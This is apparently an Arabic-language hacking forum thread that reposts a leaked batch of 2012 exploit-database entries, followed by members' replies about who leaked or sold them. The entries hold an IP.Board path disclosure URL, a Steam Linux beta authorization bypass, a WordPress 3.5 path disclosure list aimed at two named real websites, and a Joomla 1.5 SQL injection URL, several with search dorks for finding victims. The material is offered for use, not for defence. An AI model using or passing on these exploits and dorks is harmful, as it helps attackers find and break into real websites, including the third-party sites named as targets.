# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================ --> 
 
# 1337day.com [2012-12-12] 
IPBoard 3.x.x/3.4 Full Path Disclosure

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

Exploit:
admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login
 
Dork

intext:Community Forum Software by IP.Board
 
Fix

Turn off display_errors in php.ini 
 
# 1337day.com [2012-12-12] 
Steam Linux Closed Beta bypass authorization
كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

POC:
0x01 Download the Steam client for Linux here: http://media.steampowered.com/client/installer/steam.deb
 
0x02 Login to your account using the Steam Client normally
 
0x03 A message box will appear saying that you do not have authorization. Do not click OK; continue using the client normally, as if you were authorized.
 
# 1337day.com [2012-12-12] 
WordPress 3.5 multiple path disclosure vulnerabilities

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

# Exploit Title: wordpress 3.5 multiple path disclosure vulnerabilities 
# Date: [12.12.12]
# Author: [Cyb3rboy]
# Vendor or Software Link: [wordpress.org]
# Version: [wordpress 3.5]
# Category:: [webapps]
# Google dork: [use brain ]
# Tested on: [windows]
 
The following paths are vulnerable to path disclosure in WordPress 3.5:
 
/wp-settings.php
POC 
:- http://sqayasia.com/wp-settings.php
http://www.way2blogging.org/wp-settings.php
 
/wp-includes/admin-bar.php
POC
:- http://sqayasia.com/wp-includes/admin-bar.php
http://www.way2blogging.org/wp-includes/admin-bar.php
 
 
/wp-includes/author-template.php
Poc
:- http://sqayasia.com/wp-includes/author-template.php
http://www.way2blogging.org/wp-includes/author-template.php
 
/wp-includes/canonical.php
Poc
:- http://sqayasia.com/wp-includes/canonical.php
 
/wp-includes/category-template.php
Poc
:- http://sqayasia.com/wp-includes/category-template.php
http://www.way2blogging.org/wp-includes/category-template.php
 
/wp-includes/class-wp-embed.php
Poc
:- http://sqayasia.com/wp-includes/class-wp-embed.php
http://www.way2blogging.org
 
/wp-includes/media.php
POc
:- http://sqayasia.com/wp-includes/media.php
 
/wp-includes/ms-default-constants.php
Poc 
:- http://sqayasia.com/wp-includes/ms-default-constants.php
http://www.way2blogging.org
 
/wp-includes/ms-default-filters.php
Poc
:- http://sqayasia.com/wp-includes/ms-default-filters.php
http://www.way2blogging.org
 
/wp-includes/ms-settings.php
Poc
:- http://sqayasia.com/wp-includes/ms-settings.php
http://www.way2blogging.org
 
/wp-includes/post.php
Poc
:- http://sqayasia.com/wp-includes/post.php
http://www.way2blogging.org
 
/wp-includes/rss.php
Poc
:- http://sqayasia.com/wp-includes/rss.php
http://www.way2blogging.org/wp-includes/rss.php
 
/wp-includes/user.php
Poc
:- http://sqayasia.com/wp-includes/user.php
http://www.way2blogging.org/wp-includes/user.php
 
/wp-includes/theme.php
Poc
:- http://sqayasia.com/wp-includes/theme.php
http://www.way2blogging.org/wp-includes/theme.php
 
/wp-includes/vars.php
Poc
:- http://sqayasia.com/wp-includes/vars.php
http://www.way2blogging.org/wp-includes/vars.php
 
/wp-includes/class-wp-http-ixr-client.php
Poc
:- http://sqayasia.com/wp-includes/class-wp-http-ixr-client.php
 
/wp-includes/class-wp-image-editor-gd.php
Poc
:- http://sqayasia.com/wp-includes/class-wp-image-editor-gd.php
http://www.way2blogging.org/wp-includes/class-wp-image-editor-gd.php
 
/wp-includes/class-wp-image-editor-imagick.php
Poc
:- http://sqayasia.com/wp-includes/class-wp-image-editor-imagick.php
http://www.way2blogging.org/wp-includes/class-wp-image-editor-imagick.php
 
/wp-includes/class-wp-xmlrpc-server.php
Poc
:- http://sqayasia.com/wp-includes/class-wp-xmlrpc-server.php
http://www.way2blogging.org/wp-includes/class-wp-xmlrpc-server.php
 
/wp-includes/class.wp-استبدال scripts.php
Poc
:- http://sqayasia.com/wp-includes/class.wp-استبدال scripts.php
http://www.way2blogging.org/wp-includes/class.wp-استبدال scripts.php
 
/wp-includes/class.wp-styles.php
Poc
:- http://sqayasia.com/wp-includes/class.wp-styles.php
http://www.way2blogging.org/wp-includes/class.wp-styles.php
 
/wp-includes/comment-template.php
Poc
:- http://sqayasia.com/wp-includes/comment-template.php
http://www.way2blogging.org/wp-includes/comment-template.php
 
/wp-includes/default-filters.php
Poc
:- http://sqayasia.com/wp-includes/default-filters.php
http://www.way2blogging.org/wp-includes/default-filters.php
 
/wp-includes/default-widgets.php
Poc
:- http://sqayasia.com/wp-includes/default-widgets.php
http://www.way2blogging.org/wp-includes/default-widgets.php
 
/wp-includes/feed-atom-comments.php
Poc
:- http://sqayasia.com/wp-includes/feed-atom-comments.php
http://www.way2blogging.org/wp-includes/feed-atom-comments.php
 
/wp-includes/feed-atom.php
Poc
:- http://sqayasia.com/wp-includes/feed-atom.php
http://www.way2blogging.org/wp-includes/feed-atom.php
 
/wp-includes/feed-rdf.php
Poc
:-http://sqayasia.com/wp-includes/feed-rdf.php
http://www.way2blogging.org/wp-includes/feed-rdf.php
 
/wp-includes/feed-rss.php
Poc
:-http://sqayasia.com/wp-includes/feed-rss.php
http://www.way2blogging.org/wp-includes/feed-rss.php
 
/wp-includes/feed-rss2-comments.php
Poc
:- http://sqayasia.com/wp-includes/feed-rss2-comments.php
http://www.way2blogging.org/wp-includes/feed-rss2-comments.php
 
/wp-includes/feed-rss2.php
Poc
:- http://sqayasia.com/wp-includes/feed-rss2.php
http://www.way2blogging.org/wp-includes/feed-rss2.php
 
/wp-includes/functions.php
Poc
:- http://sqayasia.com/wp-includes/functions.php
http://www.way2blogging.org/wp-includes/functions.php 
 
# 1337day.com [2012-12-12] 
Joomla all v1.5 Error Based SQL Injection Vulnerability

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   
/' \            __  /'__`\        /\ \__  /'__`\                   0
0  
/\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  
\/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Caddy-dz member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
####
# Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
# E-mail: [email protected] 
# Category:: webapps
# Script home : http://joomla.com
# Dork : inurl:option=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# The author will not be responsible for any damage caused! The user assumes all responsibility.
# intended for authorized web application pentesting only!
 
// Description :
 
the affected component is /com_user/ in all joomla v1.5
P.S.: you can find the version by opening the source code of the target and searching for "joomla"; you'll see the version :-)
 
// Exploit :
 
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection)   [replacing id number by character]
 
#  priv8 youtube link, just people who has the link could view : 

shalhop بنات الخيانة و الغدر

مشكور اخي بس ممكن تحكيلنا المصدر لهذه التسريب

مين الموقع الي نزل هذا التسريب والقصة الي صارت في سرقة هذه الثغرات بعد اذنك
ومشكور مرة ثانية

mehdi racha عضو مميز

هههههههه




وجدتهم في أحد المنتديات أجنبية

jago-dz عضو مبدع

باين علي الثغرات رايحين يتسربواا

توقيع
Never Trust Number One
UzunDz فريق الحماية للأبد

مساكن خالد واسلام هههه ما نتافعوش بالثغرات
تحيا الجراتوي آخويا

توقيع
./logout
الشبح الدموي عضو مميز

تسلم اخي على الثغرات

توقيع
الشبح الدموي - G-B
g22bhotmail.com
mehdi racha عضو مميز

يقال أنا أحد اشترى التغرات كلها تم قام بتسريبها

DamaneDz x00x-Team

كان شيء واضح من أول يوم

فلم يتطوروا بعد من عدة نواحي

و أيضا هذا سيرجع عليهم بالسلب فبعد ان يتفطن البعض(أصحاب الثغرات أعلاه) من أن ثغراتهم ذهبت في مهب الريح

فسيصبح موقعا غير موثوق فيه و أيضا مهجورا ان صح التعبير

H4cker-Dz عضو مميز

المشاركة الأصلية كتبت بواسطة mehdi racha اقتباس :
هههههههه




وجدتهم في أحد المنتديات أجنبية

يا اخي مافهمت ليش تطرحوو المواضيع ل3 او اربع ايام في منتدى اخر وبعدين لحتى تطرح الموضوع هنا
يعني لو بدك تطرحووو في منتدى اخر ما في مشكل لكن لا تنتظر كل هذا الوقت لحتى تعيد طرحووو هنا
مشكور على كل حال يا غالي وان شاء الله في المرة الجاية يكون الموضوع اول شئ ينزل هووون وبعدين في باقي المواقع ههههههه تسلم اتصرف مثل ما تبي
مشكووووور

H4cker-Dz عضو مميز

المشاركة الأصلية كتبت بواسطة DamaneDz اقتباس :
كان شيء واضح من أول يوم

فلم يتطوروا بعد من عدة نواحي

و أيضا هذا سيرجع عليهم بالسلب فبعد ان يتفطن البعض(أصحاب الثغرات أعلاه) من أن ثغراتهم ذهبت في مهب الريح

فسيصبح موقعا غير موثوق فيه و أيضا مهجورا ان صح التعبير

الجزائري على العاام راكم علابالكم واش بيه خخخخخخخخخخخ
ربي يصبر اسلام والاخ الاخر
